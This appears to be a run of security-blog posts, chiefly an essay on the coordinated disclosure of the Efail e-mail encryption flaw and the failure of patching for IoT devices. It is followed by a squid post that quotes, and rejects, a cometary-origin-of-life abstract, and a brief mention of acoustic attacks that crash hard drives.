Over the past few years, researchers have started to choreograph vulnerability announcements to make a big press splash. Clever names—the e-mail vulnerability is called “Efail”—websites, and cute logos are now common. Key reporters are given advance information about the vulnerabilities. Sometimes advance teasers are released. Vendors are now part of this process, trying to announce their patches at the same time the vulnerabilities are announced.
This simultaneous announcement is best for security. While it’s always possible that some organization—either government or criminal—has independently discovered and is using the vulnerability before the researchers go public, use of the vulnerability is essentially guaranteed after the announcement. The time period between announcement and patching is the most dangerous, and everyone except would-be attackers wants to minimize it.
Things get much more complicated when multiple vendors are involved. In this case, Efail isn’t a vulnerability in a particular product; it’s a vulnerability in a standard that is used in dozens of different products. As such, the researchers had to ensure both that everyone knew about the vulnerability in time to fix it and that no one leaked the vulnerability to the public during that time. As you can imagine, that’s close to impossible.
Efail was discovered sometime last year, and the researchers alerted dozens of different companies between last October and March. Some companies took the news more seriously than others. Most patched. Amazingly, news about the vulnerability didn’t leak until the day before the scheduled announcement date. Two days before the scheduled release, the researchers unveiled a teaser—honestly, a really bad idea—which resulted in details leaking.
After the leak, the Electronic Frontier Foundation posted a notice about the vulnerability without details. The organization has been criticized for its announcement, but I am hard-pressed to find fault with its advice. (Note: I am a board member at EFF.) Then, the researchers published—and lots of press followed.
All of this speaks to the difficulty of coordinating vulnerability disclosure when it involves a large number of companies or—even more problematic—communities without clear ownership. And that’s what we have with OpenPGP. It’s even worse when the bug involves the interaction between different parts of a system. In this case, there’s nothing wrong with PGP or S/MIME in and of themselves. Rather, the vulnerability occurs because of the way many e-mail programs handle encrypted e-mail. GnuPG, an implementation of OpenPGP, decided that the bug wasn’t its fault and did nothing about it. This is arguably true, but irrelevant. They should fix it.
Expect more of these kinds of problems in the future. The Internet is shifting from a set of systems we deliberately use—our phones and computers—to a fully immersive Internet-of-things world that we live in 24/7. And like this e-mail vulnerability, vulnerabilities will emerge through the interactions of different systems. Sometimes it will be obvious who should fix the problem. Sometimes it won’t be. Sometimes it’ll be two secure systems that, when they interact in a particular way, cause an insecurity. In April, I wrote about a vulnerability that arose because Google and Netflix make different assumptions about e-mail addresses. I don’t even know who to blame for that one.
It gets even worse. Our system of disclosure and patching assumes that vendors have the expertise and ability to patch their systems, but that simply isn’t true for many of the embedded and low-cost Internet of things software packages. They’re designed at a much lower cost, often by offshore teams that come together, create the software, and then disband; as a result, there simply isn’t anyone left around to receive vulnerability alerts from researchers and write patches. Even worse, many of these devices aren’t patchable at all. Right now, if you own a digital video recorder that’s vulnerable to being recruited for a botnet—remember Mirai from 2016?—the only way to patch it is to throw it away and buy a new one.
Patching is starting to fail, which means that we’re losing the best mechanism we have for improving software security at exactly the same time that software is gaining autonomy and physical agency. Many researchers and organizations, including myself, have proposed government regulations enforcing minimal security standards for Internet-of-things devices, including standards around vulnerability disclosure and patching. This would be expensive, but it’s hard to see any other viable alternative.
Getting back to e-mail, the truth is that it’s incredibly difficult to secure well. Not because the cryptography is hard, but because we expect e-mail to do so many things. We use it for correspondence, for conversations, for scheduling, and for record-keeping. I regularly search my 20-year e-mail archive. The PGP and S/MIME security protocols are outdated, needlessly complicated, and have been difficult to use properly the whole time. If we could start again, we would design something better and more user friendly, but the huge number of legacy applications that use the existing standards means that we can’t. I tell people that if they want to communicate securely with someone, they should use one of the secure messaging systems: Signal, Off-the-Record, or—if having one of those two on your system is itself suspicious—WhatsApp. Of course they’re not perfect, as last week’s announcement of a vulnerability (patched within hours) in Signal illustrates. And they’re not as flexible as e-mail, but that makes them easier to secure.
This essay previously appeared on Lawfare.com.
Maybe not DNA, but biological somethings.
“Cause of Cambrian explosion—Terrestrial or Cosmic?”:
Abstract: We review the salient evidence consistent with or predicted by the Hoyle-Wickramasinghe (H-W) thesis of Cometary (Cosmic) Biology. Much of this physical and biological evidence is multifactorial. One particular focus are the recent studies which date the emergence of the complex retroviruses of vertebrate lines at or just before the Cambrian Explosion of ~500 Ma. Such viruses are known to be plausibly associated with major evolutionary genomic processes. We believe this coincidence is not fortuitous but is consistent with a key prediction of H-W theory whereby major extinction-diversification evolutionary boundaries coincide with virus-bearing cometary-bolide bombardment events. A second focus is the remarkable evolution of intelligent complexity (Cephalopods) culminating in the emergence of the Octopus. A third focus concerns the micro-organism fossil evidence contained within meteorites as well as the detection in the upper atmosphere of apparent incoming life-bearing particles from space. In our view the totality of the multifactorial data and critical analyses assembled by Fred Hoyle, Chandra Wickramasinghe and their many colleagues since the 1960s leads to a very plausible conclusion—life may have been seeded here on Earth by life-bearing comets as soon as conditions on Earth allowed it to flourish (about or just before 4.1 Billion years ago); and living organisms such as space-resistant and space-hardy bacteria, viruses, more complex eukaryotic cells, fertilised ova and seeds have been continuously delivered ever since to Earth so being one important driver of further terrestrial evolution which has resulted in considerable genetic diversity and which has led to the emergence of mankind.
This is almost certainly not true.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Read my blog posting guidelines here.
Playing a sound over the speakers can cause computers to crash and possibly even physically damage the hard drive.
Academic paper.